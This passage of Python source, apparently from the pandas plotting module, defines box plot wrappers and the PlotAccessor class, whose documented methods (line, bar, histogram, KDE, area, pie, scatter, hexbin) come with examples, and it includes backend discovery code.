column `a` in green and %(kind)ss for column `b` in red.
.. versionadded:: 1.1.0
**kwargs
Additional keyword arguments are documented in
:meth:`DataFrame.plot`.
Returns
-------
matplotlib.axes.Axes or np.ndarray of them
An ndarray is returned with one :class:`matplotlib.axes.Axes`
per column when ``subplots=True``.
"""
@Substitution(backend="")
@Appender(_boxplot_doc)
def boxplot(
data,
column=None,
by=None,
ax=None,
fontsize=None,
rot=0,
grid=True,
figsize=None,
layout=None,
return_type=None,
**kwargs,
):
plot_backend = _get_plot_backend("matplotlib")
return plot_backend.boxplot(
data,
column=column,
by=by,
ax=ax,
fontsize=fontsize,
rot=rot,
grid=grid,
figsize=figsize,
layout=layout,
return_type=return_type,
**kwargs,
)
@Substitution(backend=_backend_doc)
@Appender(_boxplot_doc)
def boxplot_frame(
self,
column=None,
by=None,
ax=None,
fontsize=None,
rot=0,
grid=True,
figsize=None,
layout=None,
return_type=None,
backend=None,
**kwargs,
):
plot_backend = _get_plot_backend(backend)
return plot_backend.boxplot_frame(
self,
column=column,
by=by,
ax=ax,
fontsize=fontsize,
rot=rot,
grid=grid,
figsize=figsize,
layout=layout,
return_type=return_type,
**kwargs,
)
def boxplot_frame_groupby(
grouped,
subplots=True,
column=None,
fontsize=None,
rot=0,
grid=True,
ax=None,
figsize=None,
layout=None,
sharex=False,
sharey=True,
backend=None,
**kwargs,
):
"""
Make box plots from DataFrameGroupBy data.
Parameters
----------
grouped : Grouped DataFrame
subplots : bool
* ``False`` - no subplots will be used
* ``True`` - create a subplot for each group.
column : column name or list of names, or vector
Can be any valid input to groupby.
fontsize : int or str
rot : label rotation angle
grid : Setting this to True will show the grid
ax : Matplotlib axis object, default None
figsize : A tuple (width, height) in inches
layout : tuple (optional)
The layout of the plot: (rows, columns).
sharex : bool, default False
Whether x-axes will be shared among subplots.
sharey : bool, default True
Whether y-axes will be shared among subplots.
backend : str, default None
Backend to use instead of the backend specified in the option
``plotting.backend``. For instance, 'matplotlib'. Alternatively, to
specify the ``plotting.backend`` for the whole session, set
``pd.options.plotting.backend``.
.. versionadded:: 1.0.0
**kwargs
All other plotting keyword arguments to be passed to
matplotlib's boxplot function.
Returns
-------
dict of key/value = group key/DataFrame.boxplot return value
or DataFrame.boxplot return value in case subplots=figures=False
Examples
--------
You can create boxplots for grouped data and show them as separate subplots:
.. plot::
:context: close-figs
>>> import itertools
>>> tuples = [t for t in itertools.product(range(1000), range(4))]
>>> index = pd.MultiIndex.from_tuples(tuples, names=['lvl0', 'lvl1'])
>>> data = np.random.randn(len(index),4)
>>> df = pd.DataFrame(data, columns=list('ABCD'), index=index)
>>> grouped = df.groupby(level='lvl1')
>>> grouped.boxplot(rot=45, fontsize=12, figsize=(8,10))
The ``subplots=False`` option shows the boxplots in a single figure.
.. plot::
:context: close-figs
>>> grouped.boxplot(subplots=False, rot=45, fontsize=12)
"""
plot_backend = _get_plot_backend(backend)
return plot_backend.boxplot_frame_groupby(
grouped,
subplots=subplots,
column=column,
fontsize=fontsize,
rot=rot,
grid=grid,
ax=ax,
figsize=figsize,
layout=layout,
sharex=sharex,
sharey=sharey,
**kwargs,
)
class PlotAccessor(PandasObject):
"""
Make plots of Series or DataFrame.
Uses the backend specified by the
option ``plotting.backend``. By default, matplotlib is used.
Parameters
----------
data : Series or DataFrame
The object for which the method is called.
x : label or position, default None
Only used if data is a DataFrame.
y : label, position or list of label, positions, default None
Allows plotting of one column versus another. Only used if data is a
DataFrame.
kind : str
The kind of plot to produce:
- 'line' : line plot (default)
- 'bar' : vertical bar plot
- 'barh' : horizontal bar plot
- 'hist' : histogram
- 'box' : boxplot
- 'kde' : Kernel Density Estimation plot
- 'density' : same as 'kde'
- 'area' : area plot
- 'pie' : pie plot
- 'scatter' : scatter plot (DataFrame only)
- 'hexbin' : hexbin plot (DataFrame only)
ax : matplotlib axes object, default None
An axes of the current figure.
subplots : bool, default False
Make separate subplots for each column.
sharex : bool, default True if ax is None else False
In case ``subplots=True``, share x axis and set some x axis labels
to invisible; defaults to True if ax is None otherwise False if
an ax is passed in; Be aware, that passing in both an ax and
``sharex=True`` will alter all x axis labels for all axis in a figure.
sharey : bool, default False
In case ``subplots=True``, share y axis and set some y axis labels to invisible.
layout : tuple, optional
(rows, columns) for the layout of subplots.
figsize : a tuple (width, height) in inches
Size of a figure object.
use_index : bool, default True
Use index as ticks for x axis.
title : str or list
Title to use for the plot. If a string is passed, print the string
at the top of the figure. If a list is passed and `subplots` is
True, print each item in the list above the corresponding subplot.
grid : bool, default None (matlab style default)
Axis grid lines.
legend : bool or {'reverse'}
Place legend on axis subplots.
style : list or dict
The matplotlib line style per column.
logx : bool or 'sym', default False
Use log scaling or symlog scaling on x axis.
.. versionchanged:: 0.25.0
logy : bool or 'sym' default False
Use log scaling or symlog scaling on y axis.
.. versionchanged:: 0.25.0
loglog : bool or 'sym', default False
Use log scaling or symlog scaling on both x and y axes.
.. versionchanged:: 0.25.0
xticks : sequence
Values to use for the xticks.
yticks : sequence
Values to use for the yticks.
xlim : 2-tuple/list
Set the x limits of the current axes.
ylim : 2-tuple/list
Set the y limits of the current axes.
xlabel : label, optional
Name to use for the xlabel on x-axis. Default uses index name as xlabel, or the
x-column name for planar plots.
.. versionadded:: 1.1.0
.. versionchanged:: 1.2.0
Now applicable to planar plots (`scatter`, `hexbin`).
ylabel : label, optional
Name to use for the ylabel on y-axis. Default will show no ylabel, or the
y-column name for planar plots.
.. versionadded:: 1.1.0
.. versionchanged:: 1.2.0
Now applicable to planar plots (`scatter`, `hexbin`).
rot : int, default None
Rotation for ticks (xticks for vertical, yticks for horizontal
plots).
fontsize : int, default None
Font size for xticks and yticks.
colormap : str or matplotlib colormap object, default None
Colormap to select colors from. If string, load colormap with that
name from matplotlib.
colorbar : bool, optional
If True, plot colorbar (only relevant for 'scatter' and 'hexbin'
plots).
position : float
Specify relative alignments for bar plot layout.
From 0 (left/bottom-end) to 1 (right/top-end). Default is 0.5
(center).
table : bool, Series or DataFrame, default False
If True, draw a table using the data in the DataFrame and the data
will be transposed to meet matplotlib's default layout.
If a Series or DataFrame is passed, use passed data to draw a
table.
yerr : DataFrame, Series, array-like, dict and str
See :ref:`Plotting with Error Bars <visualization.errorbars>` for
detail.
xerr : DataFrame, Series, array-like, dict and str
Equivalent to yerr.
stacked : bool, default False in line and bar plots, and True in area plot
If True, create stacked plot.
sort_columns : bool, default False
Sort column names to determine plot ordering.
secondary_y : bool or sequence, default False
Whether to plot on the secondary y-axis if a list/tuple, which
columns to plot on secondary y-axis.
mark_right : bool, default True
When using a secondary_y axis, automatically mark the column
labels with "(right)" in the legend.
include_bool : bool, default is False
If True, boolean values can be plotted.
backend : str, default None
Backend to use instead of the backend specified in the option
``plotting.backend``. For instance, 'matplotlib'. Alternatively, to
specify the ``plotting.backend`` for the whole session, set
``pd.options.plotting.backend``.
.. versionadded:: 1.0.0
**kwargs
Options to pass to matplotlib plotting method.
Returns
-------
:class:`matplotlib.axes.Axes` or numpy.ndarray of them
If the backend is not the default matplotlib one, the return value
will be the object returned by the backend.
Notes
-----
- See matplotlib documentation online for more on this subject
- If `kind` = 'bar' or 'barh', you can specify relative alignments
for bar plot layout by `position` keyword.
From 0 (left/bottom-end) to 1 (right/top-end). Default is 0.5
(center)
"""
_common_kinds = ("line", "bar", "barh", "kde", "density", "area", "hist", "box")
_series_kinds = ("pie",)
_dataframe_kinds = ("scatter", "hexbin")
_kind_aliases = {"density": "kde"}
_all_kinds = _common_kinds + _series_kinds + _dataframe_kinds
def __init__(self, data):
self._parent = data
@staticmethod
def _get_call_args(backend_name, data, args, kwargs):
"""
This function makes calls to this accessor `__call__` method compatible
with the previous `SeriesPlotMethods.__call__` and
`DataFramePlotMethods.__call__`. Those had slightly different
signatures, since `DataFramePlotMethods` accepted `x` and `y`
parameters.
"""
if isinstance(data, ABCSeries):
arg_def = [
("kind", "line"),
("ax", None),
("figsize", None),
("use_index", True),
("title", None),
("grid", None),
("legend", False),
("style", None),
("logx", False),
("logy", False),
("loglog", False),
("xticks", None),
("yticks", None),
("xlim", None),
("ylim", None),
("rot", None),
("fontsize", None),
("colormap", None),
("table", False),
("yerr", None),
("xerr", None),
("label", None),
("secondary_y", False),
("xlabel", None),
("ylabel", None),
]
elif isinstance(data, ABCDataFrame):
arg_def = [
("x", None),
("y", None),
("kind", "line"),
("ax", None),
("subplots", False),
("sharex", None),
("sharey", False),
("layout", None),
("figsize", None),
("use_index", True),
("title", None),
("grid", None),
("legend", True),
("style", None),
("logx", False),
("logy", False),
("loglog", False),
("xticks", None),
("yticks", None),
("xlim", None),
("ylim", None),
("rot", None),
("fontsize", None),
("colormap", None),
("table", False),
("yerr", None),
("xerr", None),
("secondary_y", False),
("sort_columns", False),
("xlabel", None),
("ylabel", None),
]
else:
raise TypeError(
f"Called plot accessor for type {type(data).__name__}, "
"expected Series or DataFrame"
)
if args and isinstance(data, ABCSeries):
positional_args = str(args)[1:-1]
keyword_args = ", ".join(
f"{name}={repr(value)}" for (name, default), value in zip(arg_def, args)
)
msg = (
"`Series.plot()` should not be called with positional "
"arguments, only keyword arguments. The order of "
"positional arguments will change in the future. "
f"Use `Series.plot({keyword_args})` instead of "
f"`Series.plot({positional_args})`."
)
raise TypeError(msg)
pos_args = {name: value for value, (name, _) in zip(args, arg_def)}
if backend_name == "pandas.plotting._matplotlib":
kwargs = dict(arg_def, **pos_args, **kwargs)
else:
kwargs = dict(pos_args, **kwargs)
x = kwargs.pop("x", None)
y = kwargs.pop("y", None)
kind = kwargs.pop("kind", "line")
return x, y, kind, kwargs
def __call__(self, *args, **kwargs):
plot_backend = _get_plot_backend(kwargs.pop("backend", None))
x, y, kind, kwargs = self._get_call_args(
plot_backend.__name__, self._parent, args, kwargs
)
kind = self._kind_aliases.get(kind, kind)
# when using another backend, get out of the way
if plot_backend.__name__ != "pandas.plotting._matplotlib":
return plot_backend.plot(self._parent, x=x, y=y, kind=kind, **kwargs)
if kind not in self._all_kinds:
raise ValueError(f"{kind} is not a valid plot kind")
# The original data structured can be transformed before passed to the
# backend. For example, for DataFrame is common to set the index as the
# `x` parameter, and return a Series with the parameter `y` as values.
data = self._parent.copy()
if isinstance(data, ABCSeries):
kwargs["reuse_plot"] = True
if kind in self._dataframe_kinds:
if isinstance(data, ABCDataFrame):
return plot_backend.plot(data, x=x, y=y, kind=kind, **kwargs)
else:
raise ValueError(f"plot kind {kind} can only be used for data frames")
elif kind in self._series_kinds:
if isinstance(data, ABCDataFrame):
if y is None and kwargs.get("subplots") is False:
raise ValueError(
f"{kind} requires either y column or 'subplots=True'"
)
elif y is not None:
if is_integer(y) and not data.columns.holds_integer():
y = data.columns[y]
# converted to series actually. copy to not modify
data = data[y].copy()
data.index.name = y
elif isinstance(data, ABCDataFrame):
data_cols = data.columns
if x is not None:
if is_integer(x) and not data.columns.holds_integer():
x = data_cols[x]
elif not isinstance(data[x], ABCSeries):
raise ValueError("x must be a label or position")
data = data.set_index(x)
if y is not None:
# check if we have y as int or list of ints
int_ylist = is_list_like(y) and all(is_integer(c) for c in y)
int_y_arg = is_integer(y) or int_ylist
if int_y_arg and not data.columns.holds_integer():
y = data_cols[y]
label_kw = kwargs["label"] if "label" in kwargs else False
for kw in ["xerr", "yerr"]:
if kw in kwargs and (
isinstance(kwargs[kw], str) or is_integer(kwargs[kw])
):
try:
kwargs[kw] = data[kwargs[kw]]
except (IndexError, KeyError, TypeError):
pass
# don't overwrite
data = data[y].copy()
if isinstance(data, ABCSeries):
label_name = label_kw or y
data.name = label_name
else:
match = is_list_like(label_kw) and len(label_kw) == len(y)
if label_kw and not match:
raise ValueError(
"label should be list-like and same length as y"
)
label_name = label_kw or data.columns
data.columns = label_name
return plot_backend.plot(data, kind=kind, **kwargs)
__call__.__doc__ = __doc__
@Appender(
"""
See Also
--------
matplotlib.pyplot.plot : Plot y versus x as lines and/or markers.
Examples
--------
.. plot::
:context: close-figs
>>> s = pd.Series([1, 3, 2])
>>> s.plot.line()
.. plot::
:context: close-figs
The following example shows the populations for some animals
over the years.
>>> df = pd.DataFrame({
... 'pig': [20, 18, 489, 675, 1776],
... 'horse': [4, 25, 281, 600, 1900]
... }, index=[1990, 1997, 2003, 2009, 2014])
>>> lines = df.plot.line()
.. plot::
:context: close-figs
An example with subplots, so an array of axes is returned.
>>> axes = df.plot.line(subplots=True)
>>> type(axes)
<class 'numpy.ndarray'>
.. plot::
:context: close-figs
Let's repeat the same example, but specifying colors for
each column (in this case, for each animal).
>>> axes = df.plot.line(
... subplots=True, color={"pig": "pink", "horse": "#742802"}
... )
.. plot::
:context: close-figs
The following example shows the relationship between both
populations.
>>> lines = df.plot.line(x='pig', y='horse')
"""
)
@Substitution(kind="line")
@Appender(_bar_or_line_doc)
def line(self, x=None, y=None, **kwargs):
"""
Plot Series or DataFrame as lines.
This function is useful to plot lines using DataFrame's values
as coordinates.
"""
return self(kind="line", x=x, y=y, **kwargs)
@Appender(
"""
See Also
--------
DataFrame.plot.barh : Horizontal bar plot.
DataFrame.plot : Make plots of a DataFrame.
matplotlib.pyplot.bar : Make a bar plot with matplotlib.
Examples
--------
Basic plot.
.. plot::
:context: close-figs
>>> df = pd.DataFrame({'lab':['A', 'B', 'C'], 'val':[10, 30, 20]})
>>> ax = df.plot.bar(x='lab', y='val', rot=0)
Plot a whole dataframe to a bar plot. Each column is assigned a
distinct color, and each row is nested in a group along the
horizontal axis.
.. plot::
:context: close-figs
>>> speed = [0.1, 17.5, 40, 48, 52, 69, 88]
>>> lifespan = [2, 8, 70, 1.5, 25, 12, 28]
>>> index = ['snail', 'pig', 'elephant',
... 'rabbit', 'giraffe', 'coyote', 'horse']
>>> df = pd.DataFrame({'speed': speed,
... 'lifespan': lifespan}, index=index)
>>> ax = df.plot.bar(rot=0)
Plot stacked bar charts for the DataFrame
.. plot::
:context: close-figs
>>> ax = df.plot.bar(stacked=True)
Instead of nesting, the figure can be split by column with
``subplots=True``. In this case, a :class:`numpy.ndarray` of
:class:`matplotlib.axes.Axes` are returned.
.. plot::
:context: close-figs
>>> axes = df.plot.bar(rot=0, subplots=True)
>>> axes[1].legend(loc=2) # doctest: +SKIP
If you don't like the default colours, you can specify how you'd
like each column to be colored.
.. plot::
:context: close-figs
>>> axes = df.plot.bar(
... rot=0, subplots=True, color={"speed": "red", "lifespan": "green"}
... )
>>> axes[1].legend(loc=2) # doctest: +SKIP
Plot a single column.
.. plot::
:context: close-figs
>>> ax = df.plot.bar(y='speed', rot=0)
Plot only selected categories for the DataFrame.
.. plot::
:context: close-figs
>>> ax = df.plot.bar(x='lifespan', rot=0)
"""
)
@Substitution(kind="bar")
@Appender(_bar_or_line_doc)
def bar(self, x=None, y=None, **kwargs):
"""
Vertical bar plot.
A bar plot is a plot that presents categorical data with
rectangular bars with lengths proportional to the values that they
represent. A bar plot shows comparisons among discrete categories. One
axis of the plot shows the specific categories being compared, and the
other axis represents a measured value.
"""
return self(kind="bar", x=x, y=y, **kwargs)
@Appender(
"""
See Also
--------
DataFrame.plot.bar: Vertical bar plot.
DataFrame.plot : Make plots of DataFrame using matplotlib.
matplotlib.axes.Axes.bar : Plot a vertical bar plot using matplotlib.
Examples
--------
Basic example
.. plot::
:context: close-figs
>>> df = pd.DataFrame({'lab': ['A', 'B', 'C'], 'val': [10, 30, 20]})
>>> ax = df.plot.barh(x='lab', y='val')
Plot a whole DataFrame to a horizontal bar plot
.. plot::
:context: close-figs
>>> speed = [0.1, 17.5, 40, 48, 52, 69, 88]
>>> lifespan = [2, 8, 70, 1.5, 25, 12, 28]
>>> index = ['snail', 'pig', 'elephant',
... 'rabbit', 'giraffe', 'coyote', 'horse']
>>> df = pd.DataFrame({'speed': speed,
... 'lifespan': lifespan}, index=index)
>>> ax = df.plot.barh()
Plot stacked barh charts for the DataFrame
.. plot::
:context: close-figs
>>> ax = df.plot.barh(stacked=True)
We can specify colors for each column
.. plot::
:context: close-figs
>>> ax = df.plot.barh(color={"speed": "red", "lifespan": "green"})
Plot a column of the DataFrame to a horizontal bar plot
.. plot::
:context: close-figs
>>> speed = [0.1, 17.5, 40, 48, 52, 69, 88]
>>> lifespan = [2, 8, 70, 1.5, 25, 12, 28]
>>> index = ['snail', 'pig', 'elephant',
... 'rabbit', 'giraffe', 'coyote', 'horse']
>>> df = pd.DataFrame({'speed': speed,
... 'lifespan': lifespan}, index=index)
>>> ax = df.plot.barh(y='speed')
Plot DataFrame versus the desired column
.. plot::
:context: close-figs
>>> speed = [0.1, 17.5, 40, 48, 52, 69, 88]
>>> lifespan = [2, 8, 70, 1.5, 25, 12, 28]
>>> index = ['snail', 'pig', 'elephant',
... 'rabbit', 'giraffe', 'coyote', 'horse']
>>> df = pd.DataFrame({'speed': speed,
... 'lifespan': lifespan}, index=index)
>>> ax = df.plot.barh(x='lifespan')
"""
)
@Substitution(kind="bar")
@Appender(_bar_or_line_doc)
def barh(self, x=None, y=None, **kwargs):
"""
Make a horizontal bar plot.
A horizontal bar plot is a plot that presents quantitative data with
rectangular bars with lengths proportional to the values that they
represent. A bar plot shows comparisons among discrete categories. One
axis of the plot shows the specific categories being compared, and the
other axis represents a measured value.
"""
return self(kind="barh", x=x, y=y, **kwargs)
def box(self, by=None, **kwargs):
r"""
Make a box plot of the DataFrame columns.
A box plot is a method for graphically depicting groups of numerical
data through their quartiles.
The box extends from the Q1 to Q3 quartile values of the data,
with a line at the median (Q2). The whiskers extend from the edges
of box to show the range of the data. The position of the whiskers
is set by default to 1.5*IQR (IQR = Q3 - Q1) from the edges of the
box. Outlier points are those past the end of the whiskers.
For further details see Wikipedia's
entry for `boxplot <https://en.wikipedia.org/wiki/Box_plot>`__.
A consideration when using this chart is that the box and the whiskers
can overlap, which is very common when plotting small sets of data.
Parameters
----------
by : str or sequence
Column in the DataFrame to group by.
**kwargs
Additional keywords are documented in
:meth:`DataFrame.plot`.
Returns
-------
:class:`matplotlib.axes.Axes` or numpy.ndarray of them
See Also
--------
DataFrame.boxplot: Another method to draw a box plot.
Series.plot.box: Draw a box plot from a Series object.
matplotlib.pyplot.boxplot: Draw a box plot in matplotlib.
Examples
--------
Draw a box plot from a DataFrame with four columns of randomly
generated data.
.. plot::
:context: close-figs
>>> data = np.random.randn(25, 4)
>>> df = pd.DataFrame(data, columns=list('ABCD'))
>>> ax = df.plot.box()
"""
return self(kind="box", by=by, **kwargs)
def hist(self, by=None, bins=10, **kwargs):
"""
Draw one histogram of the DataFrame's columns.
A histogram is a representation of the distribution of data.
This function groups the values of all given Series in the DataFrame
into bins and draws all bins in one :class:`matplotlib.axes.Axes`.
This is useful when the DataFrame's Series are in a similar scale.
Parameters
----------
by : str or sequence, optional
Column in the DataFrame to group by.
bins : int, default 10
Number of histogram bins to be used.
**kwargs
Additional keyword arguments are documented in
:meth:`DataFrame.plot`.
Returns
-------
class:`matplotlib.AxesSubplot`
Return a histogram plot.
See Also
--------
DataFrame.hist : Draw histograms per DataFrame's Series.
Series.hist : Draw a histogram with Series' data.
Examples
--------
When we draw a dice 6000 times, we expect to get each value around 1000
times. But when we draw two dices and sum the result, the distribution
is going to be quite different. A histogram illustrates those
distributions.
.. plot::
:context: close-figs
>>> df = pd.DataFrame(
... np.random.randint(1, 7, 6000),
... columns = ['one'])
>>> df['two'] = df['one'] + np.random.randint(1, 7, 6000)
>>> ax = df.plot.hist(bins=12, alpha=0.5)
"""
return self(kind="hist", by=by, bins=bins, **kwargs)
def kde(self, bw_method=None, ind=None, **kwargs):
"""
Generate Kernel Density Estimate plot using Gaussian kernels.
In statistics, `kernel density estimation`_ (KDE) is a non-parametric
way to estimate the probability density function (PDF) of a random
variable. This function uses Gaussian kernels and includes automatic
bandwidth determination.
.. _kernel density estimation:
https://en.wikipedia.org/wiki/Kernel_density_estimation
Parameters
----------
bw_method : str, scalar or callable, optional
The method used to calculate the estimator bandwidth. This can be
'scott', 'silverman', a scalar constant or a callable.
If None (default), 'scott' is used.
See :class:`scipy.stats.gaussian_kde` for more information.
ind : NumPy array or int, optional
Evaluation points for the estimated PDF. If None (default),
1000 equally spaced points are used. If `ind` is a NumPy array, the
KDE is evaluated at the points passed. If `ind` is an integer,
`ind` number of equally spaced points are used.
**kwargs
Additional keyword arguments are documented in
:meth:`pandas.%(this-datatype)s.plot`.
Returns
-------
matplotlib.axes.Axes or numpy.ndarray of them
See Also
--------
scipy.stats.gaussian_kde : Representation of a kernel-density
estimate using Gaussian kernels. This is the function used
internally to estimate the PDF.
Examples
--------
Given a Series of points randomly sampled from an unknown
distribution, estimate its PDF using KDE with automatic
bandwidth determination and plot the results, evaluating them at
1000 equally spaced points (default):
.. plot::
:context: close-figs
>>> s = pd.Series([1, 2, 2.5, 3, 3.5, 4, 5])
>>> ax = s.plot.kde()
A scalar bandwidth can be specified. Using a small bandwidth value can
lead to over-fitting, while using a large bandwidth value may result
in under-fitting:
.. plot::
:context: close-figs
>>> ax = s.plot.kde(bw_method=0.3)
.. plot::
:context: close-figs
>>> ax = s.plot.kde(bw_method=3)
Finally, the `ind` parameter determines the evaluation points for the
plot of the estimated PDF:
.. plot::
:context: close-figs
>>> ax = s.plot.kde(ind=[1, 2, 3, 4, 5])
For DataFrame, it works in the same way:
.. plot::
:context: close-figs
>>> df = pd.DataFrame({
... 'x': [1, 2, 2.5, 3, 3.5, 4, 5],
... 'y': [4, 4, 4.5, 5, 5.5, 6, 6],
... })
>>> ax = df.plot.kde()
A scalar bandwidth can be specified. Using a small bandwidth value can
lead to over-fitting, while using a large bandwidth value may result
in under-fitting:
.. plot::
:context: close-figs
>>> ax = df.plot.kde(bw_method=0.3)
.. plot::
:context: close-figs
>>> ax = df.plot.kde(bw_method=3)
Finally, the `ind` parameter determines the evaluation points for the
plot of the estimated PDF:
.. plot::
:context: close-figs
>>> ax = df.plot.kde(ind=[1, 2, 3, 4, 5, 6])
"""
return self(kind="kde", bw_method=bw_method, ind=ind, **kwargs)
density = kde
def area(self, x=None, y=None, **kwargs):
"""
Draw a stacked area plot.
An area plot displays quantitative data visually.
This function wraps the matplotlib area function.
Parameters
----------
x : label or position, optional
Coordinates for the X axis. By default uses the index.
y : label or position, optional
Column to plot. By default uses all columns.
stacked : bool, default True
Area plots are stacked by default. Set to False to create a
unstacked plot.
**kwargs
Additional keyword arguments are documented in
:meth:`DataFrame.plot`.
Returns
-------
matplotlib.axes.Axes or numpy.ndarray
Area plot, or array of area plots if subplots is True.
See Also
--------
DataFrame.plot : Make plots of DataFrame using matplotlib / pylab.
Examples
--------
Draw an area plot based on basic business metrics:
.. plot::
:context: close-figs
>>> df = pd.DataFrame({
... 'sales': [3, 2, 3, 9, 10, 6],
... 'signups': [5, 5, 6, 12, 14, 13],
... 'visits': [20, 42, 28, 62, 81, 50],
... }, index=pd.date_range(start='2018/01/01', end='2018/07/01',
... freq='M'))
>>> ax = df.plot.area()
Area plots are stacked by default. To produce an unstacked plot,
pass ``stacked=False``:
.. plot::
:context: close-figs
>>> ax = df.plot.area(stacked=False)
Draw an area plot for a single column:
.. plot::
:context: close-figs
>>> ax = df.plot.area(y='sales')
Draw with a different `x`:
.. plot::
:context: close-figs
>>> df = pd.DataFrame({
... 'sales': [3, 2, 3],
... 'visits': [20, 42, 28],
... 'day': [1, 2, 3],
... })
>>> ax = df.plot.area(x='day')
"""
return self(kind="area", x=x, y=y, **kwargs)
def pie(self, **kwargs):
"""
Generate a pie plot.
A pie plot is a proportional representation of the numerical data in a
column. This function wraps :meth:`matplotlib.pyplot.pie` for the
specified column. If no column reference is passed and
``subplots=True`` a pie plot is drawn for each numerical column
independently.
Parameters
----------
y : int or label, optional
Label or position of the column to plot.
If not provided, ``subplots=True`` argument must be passed.
**kwargs
Keyword arguments to pass on to :meth:`DataFrame.plot`.
Returns
-------
matplotlib.axes.Axes or np.ndarray of them
A NumPy array is returned when `subplots` is True.
See Also
--------
Series.plot.pie : Generate a pie plot for a Series.
DataFrame.plot : Make plots of a DataFrame.
Examples
--------
In the example below we have a DataFrame with the information about
planet's mass and radius. We pass the 'mass' column to the
pie function to get a pie plot.
.. plot::
:context: close-figs
>>> df = pd.DataFrame({'mass': [0.330, 4.87 , 5.97],
... 'radius': [2439.7, 6051.8, 6378.1]},
... index=['Mercury', 'Venus', 'Earth'])
>>> plot = df.plot.pie(y='mass', figsize=(5, 5))
.. plot::
:context: close-figs
>>> plot = df.plot.pie(subplots=True, figsize=(11, 6))
"""
if (
isinstance(self._parent, ABCDataFrame)
and kwargs.get("y", None) is None
and not kwargs.get("subplots", False)
):
raise ValueError("pie requires either y column or 'subplots=True'")
return self(kind="pie", **kwargs)
def scatter(self, x, y, s=None, c=None, **kwargs):
"""
Create a scatter plot with varying marker point size and color.
The coordinates of each point are defined by two dataframe columns and
filled circles are used to represent each point. This kind of plot is
useful to see complex correlations between two variables. Points could
be for instance natural 2D coordinates like longitude and latitude in
a map or, in general, any pair of metrics that can be plotted against
each other.
Parameters
----------
x : int or str
The column name or column position to be used as horizontal
coordinates for each point.
y : int or str
The column name or column position to be used as vertical
coordinates for each point.
s : str, scalar or array_like, optional
The size of each point. Possible values are:
- A string with the name of the column to be used for marker's size.
- A single scalar so all points have the same size.
- A sequence of scalars, which will be used for each point's size
recursively. For instance, when passing [2,14] all points size
will be either 2 or 14, alternatively.
.. versionchanged:: 1.1.0
c : str, int or array_like, optional
The color of each point. Possible values are:
- A single color string referred to by name, RGB or RGBA code,
for instance 'red' or '#a98d19'.
- A sequence of color strings referred to by name, RGB or RGBA
code, which will be used for each point's color recursively. For
instance ['green','yellow'] all points will be filled in green or
yellow, alternatively.
- A column name or position whose values will be used to color the
marker points according to a colormap.
**kwargs
Keyword arguments to pass on to :meth:`DataFrame.plot`.
Returns
-------
:class:`matplotlib.axes.Axes` or numpy.ndarray of them
See Also
--------
matplotlib.pyplot.scatter : Scatter plot using multiple input data
formats.
Examples
--------
Let's see how to draw a scatter plot using coordinates from the values
in a DataFrame's columns.
.. plot::
:context: close-figs
>>> df = pd.DataFrame([[5.1, 3.5, 0], [4.9, 3.0, 0], [7.0, 3.2, 1],
... [6.4, 3.2, 1], [5.9, 3.0, 2]],
... columns=['length', 'width', 'species'])
>>> ax1 = df.plot.scatter(x='length',
... y='width',
... c='DarkBlue')
And now with the color determined by a column as well.
.. plot::
:context: close-figs
>>> ax2 = df.plot.scatter(x='length',
... y='width',
... c='species',
... colormap='viridis')
"""
return self(kind="scatter", x=x, y=y, s=s, c=c, **kwargs)
def hexbin(self, x, y, C=None, reduce_C_function=None, gridsize=None, **kwargs):
"""
Generate a hexagonal binning plot.
Generate a hexagonal binning plot of `x` versus `y`. If `C` is `None`
(the default), this is a histogram of the number of occurrences
of the observations at ``(x[i], y[i])``.
If `C` is specified, specifies values at given coordinates
``(x[i], y[i])``. These values are accumulated for each hexagonal
bin and then reduced according to `reduce_C_function`,
having as default the NumPy's mean function (:meth:`numpy.mean`).
(If `C` is specified, it must also be a 1-D sequence
of the same length as `x` and `y`, or a column label.)
Parameters
----------
x : int or str
The column label or position for x points.
y : int or str
The column label or position for y points.
C : int or str, optional
The column label or position for the value of `(x, y)` point.
reduce_C_function : callable, default `np.mean`
Function of one argument that reduces all the values in a bin to
a single number (e.g. `np.mean`, `np.max`, `np.sum`, `np.std`).
gridsize : int or tuple of (int, int), default 100
The number of hexagons in the x-direction.
The corresponding number of hexagons in the y-direction is
chosen in a way that the hexagons are approximately regular.
Alternatively, gridsize can be a tuple with two elements
specifying the number of hexagons in the x-direction and the
y-direction.
**kwargs
Additional keyword arguments are documented in
:meth:`DataFrame.plot`.
Returns
-------
matplotlib.AxesSubplot
The matplotlib ``Axes`` on which the hexbin is plotted.
See Also
--------
DataFrame.plot : Make plots of a DataFrame.
matplotlib.pyplot.hexbin : Hexagonal binning plot using matplotlib,
the matplotlib function that is used under the hood.
Examples
--------
The following examples are generated with random data from
a normal distribution.
.. plot::
:context: close-figs
>>> n = 10000
>>> df = pd.DataFrame({'x': np.random.randn(n),
... 'y': np.random.randn(n)})
>>> ax = df.plot.hexbin(x='x', y='y', gridsize=20)
The next example uses `C` and `np.sum` as `reduce_C_function`.
Note that `'observations'` values ranges from 1 to 5 but the result
plot shows values up to more than 25. This is because of the
`reduce_C_function`.
.. plot::
:context: close-figs
>>> n = 500
>>> df = pd.DataFrame({
... 'coord_x': np.random.uniform(-3, 3, size=n),
... 'coord_y': np.random.uniform(30, 50, size=n),
... 'observations': np.random.randint(1,5, size=n)
... })
>>> ax = df.plot.hexbin(x='coord_x',
... y='coord_y',
... C='observations',
... reduce_C_function=np.sum,
... gridsize=10,
... cmap="viridis")
"""
if reduce_C_function is not None:
kwargs["reduce_C_function"] = reduce_C_function
if gridsize is not None:
kwargs["gridsize"] = gridsize
return self(kind="hexbin", x=x, y=y, C=C, **kwargs)
_backends = {}
def _find_backend(backend: str):
"""
Find a pandas plotting backend>
Parameters
----------
backend : str
The identifier for the backend. Either an entrypoint item registered
with pkg_resources, or a module name.
Notes
-----
Modifies _backends with imported backends as a side effect.
Returns
-------
types.ModuleType
The imported backend.
"""
import pkg_resources # Delay import for performance.
for entry_point in pkg_resources.iter_entry_points("pandas_plotting_backends"):
if entry_point.name == "matplotlib":
# matplotlib is an optional dependency. When
# missing, this would raise.
continue
_backends[entry_point.name] = entry_point.load()
try:
return _backends[backend]
except KeyError:
# Fall back to unregistered, module name approach.
try:
module = importlib.import_module(backend)
except ImportError:
# We re-raise later on.
pass
else:
if hasattr(module, "plot"):
# Validate that the interface is implemented when the option
# is set, rather than at plot time.
_backends[backend] = module
return module
raise ValueError(
f"Could not find plotting backend '{backend}'. Ensure that you've installed "
f"the package providing the '{backend}' entrypoint, or that the package has a "
"top-level `.plot` method."
)
def _get_plot_backend(backend=None):
"""
